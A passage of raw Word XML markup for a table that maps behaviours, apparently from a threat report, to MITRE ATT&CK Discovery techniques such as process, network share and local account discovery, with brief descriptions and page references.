                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F2F07F" w14:textId="45B17C83" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="144A4683" w14:textId="1F3A12E0" w:rsidR="00674213" w:rsidRPr="00F16C9D" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AED4C82" w14:textId="3303306A" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="006C6B41">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">p35. </w:t>
            </w:r>
            <w:r w:rsidR="00674213" w:rsidRPr="00F16C9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Open an interactive command shell (usually Windows’ cmd.exe)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007FC2B2" w14:textId="6140B85A" w:rsidR="006C6B41" w:rsidRPr="00F16C9D" w:rsidRDefault="006C6B41" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="6557BF6A" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1185D7E1" w14:textId="0185C82E" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B78F6E" w14:textId="43C819E6" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B064DBE" w14:textId="58D1EC78" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F65899">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F65899">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1057 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F65899">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE1699D" w14:textId="1740AE85" w:rsidR="00674213" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F50A1D6" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5122A15A" w14:textId="45028734"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319D5B9E" w14:textId="600C40E6" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CE33C4" w14:textId="3874F96A" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00674213">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">From </w:t>
            </w:r>
            <w:r w:rsidR="00674213" w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Internal Reconnaissance (p35+)</w:t>
            </w:r>
            <w:r w:rsidR="00674213">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> below</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40633605" w14:textId="77777777" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CD07CFC" w14:textId="22285EEB" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542E8E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>List/start/stop processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="26F3F4AF" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="325DE616" w14:textId="081B2720" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5750ADD6" w14:textId="6E965682" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D29CE65" w14:textId="3C343D7B" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1135 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Network Share Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57DFE8DC" w14:textId="23526B19" w:rsidR="00674213" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41EEF1CF" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20FFD6C1" w14:textId="0D09B906"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43F5168A" w14:textId="3E2EB5C3" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C6E8513" w14:textId="3BA1CE3D" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="4DAC2892" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABF9FCC" w14:textId="1E23370A" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64623278" w14:textId="18819DC8" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26370BDF" w14:textId="154BD7DA" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1016 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CF4188" w14:textId="500C4F73" w:rsidR="00674213" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DDA253" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BDD9FE2" w14:textId="490BDA92"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3211B7E1" w14:textId="002F2651" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC7F26D" w14:textId="5B7E3A1D" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="7EA3D4E7" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4040979D" w14:textId="72B4D01C" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="090539DB" w14:textId="3F8ED281" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2889358A" w14:textId="67BC1094" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1087.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D7C4B4" w14:textId="0B485AFC" w:rsidR="00674213" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E08FBE4" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBDAD50" w14:textId="66CCE023"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1AA1F181" w14:textId="3DE9D5D9" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BA999C" w14:textId="207A7D0E" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="5BF8E82F" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69EB2251" w14:textId="39EEFE66" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00316A64">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C906AE5" w14:textId="652E7853" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
